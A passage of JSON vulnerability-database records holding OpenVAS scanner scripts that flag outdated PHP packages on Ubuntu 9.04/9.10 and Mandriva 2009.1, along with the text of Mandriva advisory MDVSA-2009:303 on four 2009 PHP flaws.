rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.6.dfsg.1-3ubuntu4.4\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.10.dfsg.1-2ubuntu6.3\", rls:\"UBUNTU9.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:57:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4018", "CVE-2009-4017", "CVE-2009-3557"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:303.", "modified": "2017-07-06T00:00:00", "published": "2009-12-03T00:00:00", "id": "OPENVAS:66320", "href": "http://plugins.openvas.org/nasl.php?oid=66320", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:303 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_303.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:303 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Some vulnerabilities were discovered and corrected in php-5.2.11:\n\nThe tempnam function in ext/standard/file.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers\nto bypass safe_mode restrictions, and create files in group-writable\nor world-writable directories, via the dir and prefix arguments\n(CVE-2009-3557).\n\nThe posix_mkfifo function in ext/posix/posix.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers\nto bypass open_basedir restrictions, and create FIFO files, via the\npathname and mode arguments, as demonstrated by creating a .htaccess\nfile (CVE-2009-3558).\n\nPHP 5.2.11, and 5.3.x before 5.3.1, does not restrict the number\nof temporary files created when handling a multipart/form-data POST\nrequest, which allows remote attackers to cause a denial of service\n(resource exhaustion), and makes it easier for remote attackers to\nexploit local file inclusion vulnerabilities, via multiple requests,\nrelated to lack of support for the max_file_uploads directive\n(CVE-2009-4017).\n\nThe proc_open function in ext/standard/proc_open.c in PHP\nbefore 5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)\nsafe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars\ndirectives, which allows context-dependent attackers to execute\nprograms with an arbitrary environment via the env parameter, as\ndemonstrated by a crafted value of the LD_LIBRARY_PATH environment\nvariable (CVE-2009-4018).\n\nIntermittent segfaults occurred on x86_64 with the latest phpmyadmin\nand with apache (#53735).\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.\n\nAffected: 2009.1\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:303\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:303.\";\n\n \n\nif(description)\n{\n script_id(66320);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-03 22:10:42 +0100 (Thu, 03 Dec 2009)\");\n script_cve_id(\"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:303 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache-mod_php\", rpm:\"apache-mod_php~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-apc\", rpm:\"php-apc~3.1.3p1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-apc-admin\", rpm:\"php-apc-admin~3.1.3p1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbx\", rpm:\"php-dbx~1.1.0~26.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dio\", rpm:\"php-dio~0.0.2~3.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.5.3~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-eaccelerator-admin\", rpm:\"php-eaccelerator-admin~0.9.5.3~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fam\", rpm:\"php-fam~5.0.1~7.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fileinfo\", rpm:\"php-fileinfo~1.0.4~15.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filepro\", rpm:\"php-filepro~5.1.6~17.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-idn\", rpm:\"php-idn~1.2b~15.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ini\", rpm:\"php-ini~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcal\", rpm:\"php-mcal~0.6~27.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-optimizer\", rpm:\"php-optimizer~0.1~0.alpha1.5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sasl\", rpm:\"php-sasl~0.1.0~25.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ssh2\", rpm:\"php-ssh2~0.11.0~2.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-suhosin\", rpm:\"php-suhosin~0.9.29~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sybase\", rpm:\"php-sybase~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tclink\", rpm:\"php-tclink~3.4.4~10.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-translit\", rpm:\"php-translit~0.6.0~7.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-vld\", rpm:\"php-vld~0.9.1~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xattr\", rpm:\"php-xattr~1.1.0~6.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xdebug\", rpm:\"php-xdebug~2.0.5~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zip\", rpm:\"php-zip~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4018", "CVE-2009-4017", "CVE-2009-3557"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:303.", "modified": "2018-04-06T00:00:00", "published": "2009-12-03T00:00:00", "id": "OPENVAS:136141256231066320", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066320", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:303 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_303.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:303 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Some vulnerabilities were discovered and corrected in php-5.2.11:\n\nThe tempnam function in ext/standard/file.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers\nto bypass safe_mode restrictions, and create files in group-writable\nor world-writable directories, via the dir and prefix arguments\n(CVE-2009-3557).\n\nThe posix_mkfifo function in ext/posix/posix.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers\nto bypass open_basedir restrictions, and create FIFO files, via the\npathname and mode arguments, as demonstrated by creating a .htaccess\nfile (CVE-2009-3558).\n\nPHP 5.2.11, and 5.3.x before 5.3.1, does not restrict the number\nof temporary files created when handling a multipart/form-data POST\nrequest, which allows remote attackers to cause a denial of service\n(resource exhaustion), and makes it easier for remote attackers to\nexploit local file inclusion vulnerabilities, via multiple requests,\nrelated to lack of support for the max_file_uploads directive\n(CVE-2009-4017).\n\nThe proc_open function in ext/standard/proc_open.c in PHP\nbefore 5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)\nsafe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars\ndirectives, which allows context-dependent attackers to execute\nprograms with an arbitrary environment via the env parameter, as\ndemonstrated by a crafted value of the LD_LIBRARY_PATH environment\nvariable (CVE-2009-4018).\n\nIntermittent segfaults occurred on x86_64 with the latest phpmyadmin\nand with apache (#53735).\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.\n\nAffected: 2009.1\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:303\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:303.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66320\");\n script_version(\"$Revision: 9350 